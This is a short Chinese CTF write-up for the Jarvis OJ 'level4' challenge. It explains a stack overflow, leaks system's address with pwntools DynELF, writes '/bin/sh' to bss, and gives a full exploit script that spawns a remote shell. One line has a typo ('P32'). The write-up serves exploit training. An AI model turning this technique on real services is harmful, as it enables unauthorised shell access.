pwn level4
借助DynELF实现无libc的漏洞:这篇讲的挺好
- 检查保护机制
- ida打开文件,发现read函数栈溢出漏洞,想要用ret2libc解决,但是在漏洞函数前没有其他函数执行,所以不能进行泄漏函数得到libc版本。
- 在无libc情况下,通过DynELF进行泄漏system函数。有了system地址,但是没有binsh字符串,这里可以通过read函数,从标准输入,写到bss段,然后把写入bss地址的内容作为system函数的参数,实现利用。
- 寻找bss段地址:在gdb里输入vmmap即可,找到可读可写的地址范围。
- 利用脚本如下:
from pwn import *
r = remote("pwn2.jarvisoj.com",9880)
e = ELF('./level4')
write_plt = e.symbols['write']
vul_addr = 0x804844b
bss_addr = 0x804a024
def leak(address): #这是DynELF泄漏system的模版
payload1 = 'a'*0x88+'bbbb'+p32(write_plt)+p32(vul_addr)+P32(1)+p32(address)+p32(4)
r.sendline(payload1)
data = r.recv(4)
return data
d = DynELF(leak,elf=e)
system_addr = d.lookup('system','libc')
print hex(system_addr)
read_plt = e.symbols['read']
payload2 = 'a'*0x88+'bbbb'+p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
r.sendline(payload2)
r.send('/bin/sh\x00')
payload3 = 'a'*0x88+'bbbb'+p32(system_addr)+'bbbb'+p32(bss_addr)
r.sendline(payload3)
r.interactive()